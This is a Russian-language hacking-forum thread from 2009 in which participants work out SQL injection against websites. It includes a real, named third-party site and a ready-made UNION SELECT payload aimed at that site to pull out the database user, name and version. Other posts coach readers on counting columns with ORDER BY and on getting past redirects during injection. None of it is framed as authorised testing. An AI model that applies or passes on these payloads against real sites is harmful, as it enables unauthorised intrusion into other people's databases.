ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
11.04.2009, 23:16
|
|
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
Провел на форуме:
859739
Репутация:
146
|
|
http://www.site.ru/events/?page=1
при подстановке "-" перед 1 выскакивает это сообщение
|
|
|
11.04.2009, 23:41
|
|
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766
Репутация:
317
|
|
Попробуй вместо - ,поставить 9999 (разумеется вместо 1)
Дай линк.......
Если не хочеш светить всем, скинь каму нить в ПМ....
Вариантов много может быть..
Последний раз редактировалось farex; 11.04.2009 в 23:44..
|
|
|
|
11.04.2009, 23:58
|
|
Участник форума
Регистрация: 15.03.2009
Сообщений: 231
Провел на форуме:
859739
Репутация:
146
|
|
http://www.mir-bankov.ru/events/?page=1
|
|
|
|
12.04.2009, 00:21
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от navigat0r
http://www.mir-bankov.ru/events/?page=1
Инъекция после лимита при наличии ордер бая невозможна
Но ты рано сдался и выложил ссылку =( Тут работают лучшие телепаты страны
|
|
|
|
12.04.2009, 04:04
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969
Репутация:
169
|
|
Код:
http://www.mir-bankov.ru/glossary/?letter=99%C7'+union+select+convert(concat_ws(0x3a,user(),database(),version())+using+cp1251),2,3/*
|
|
|
|
12.04.2009, 08:10
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
Что делать если при SQL-inj (при ошибке похоже) идёт редерект на index.php ?
|
|
|
|
12.04.2009, 08:16
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
2 Byrger
Если тока при ошибке, то недопускать ошибок =)
ордер баем по присутсвию редиректа вычисляешь кол-во полей, проверяешь, ставя union+select+кол-во полей--+ если редиректа нету, крутишь скулю дальше, ничего особенного  |
|
|
|
12.04.2009, 10:13
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от Iceangel_
2 Byrger
Если тока при ошибке, то недопускать ошибок =)
ордер баем по присутсвию редиректа вычисляешь кол-во полей, проверяешь, ставя union+select+кол-во полей--+ если редиректа нету, крутишь скулю дальше, ничего особенного Бывает, что редирект идет просто вне зависимости от правильности условия, в таком случае необходимо в настройках броузера убрать автомат перенаправления, могу привести пример...
|
|
|
|
12.04.2009, 10:41
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
Провел на форуме:
791766
Репутация:
61
|
|
А смотрите допустим я нашёл дырку
site.ru/news.php?id=1+union+select+1,2--
Теперь нам надо вывести мои 1,2
Но есть я делаю так
site.ru/news.php?id=1999+union+select+1,2--
или
site.ru/news.php?id=-1+union+select+1,2--
То идёт 404 
Как быть?
Это 100% редирект идёт так-как новость не найдена...а SQL-inj Есть
Последний раз редактировалось Byrger; 12.04.2009 в 10:48..
|
|
|
|
12.04.2009, 10:42
|
|
Banned
Регистрация: 11.10.2006
Сообщений: 682
Провел на форуме:
3750406
Репутация:
271
|
|
Теперь нам надо вывести смои 1,2
чиво???
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
